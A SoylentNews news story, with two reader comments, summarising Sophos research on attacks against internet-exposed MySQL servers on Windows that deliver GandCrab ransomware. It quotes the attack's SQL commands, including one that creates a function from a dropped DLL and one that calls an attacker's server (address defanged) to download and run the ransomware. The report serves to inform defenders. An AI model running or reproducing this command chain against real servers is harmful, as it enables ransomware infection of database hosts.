Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Monday May 27 2019, @09:13PM   Printer-friendly
from the don't-do-that dept.

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the "set" command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

Tracking back through the attack chain, the researchers determined that the malware was downloaded from the source ~3100 times since mid April. Each download potentially indicating an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system (geolocated in Arizona) hosting the malware is in simplified Chinese.

While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.

Detailed Analysis


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 0) by Anonymous Coward on Wednesday May 29 2019, @03:01AM (1 child)

    by Anonymous Coward on Wednesday May 29 2019, @03:01AM (#848753)

    You're totally right that the internet-facing 3306es are stupid misconfiguration. I think we're eye to eye on that.

    But I don't agree about "who were impacted by this" unless you mean by this particular actor under analysis, and not the general vector. The specific actor is just Shodaning for 3360 and taking advantage and you're right, the odds that this is the only insecurity exposed by those machines is nearly nil.

  • (Score: 2) by NotSanguine on Wednesday May 29 2019, @03:11AM

    Those "impacted" that I referred to were the folks whose MySQL instances were compromised, not the malicious actor(s).

    I'm not sure how you'd think otherwise.

    --
    No, no, you're not thinking; you're just being logical. --Niels Bohr